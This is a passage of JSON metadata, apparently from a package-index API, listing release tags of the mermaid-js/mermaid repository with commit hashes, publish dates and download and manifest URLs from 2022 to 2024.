lished_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1/manifests"},{"name":"@mermaid-js/parser@0.2.0","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0/manifests"},{"name":"mermaid@11.0.1","sha":"4d10e3f2586fb8b08b72d93a1036a17d53153997","kind":"tag","published_at":"2024-08-23T15:04:26.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1/manifests"},{"name":"v11.0.0","sha":"2cfdd1620a8ceef37c0b738569dfb8bcc0005547","kind":"commit","published_at":"2024-08-23T12:07:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v11.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v11.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v11.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0/manifests"},{"name":"v10.9.1","sha":"dab26df9c4ca69cc4a8c46a22286a2f63ea9ed3e","kind":"commit","published_at":"2024-05-14T10:55:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1/manifests"},{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifests"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10df83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmer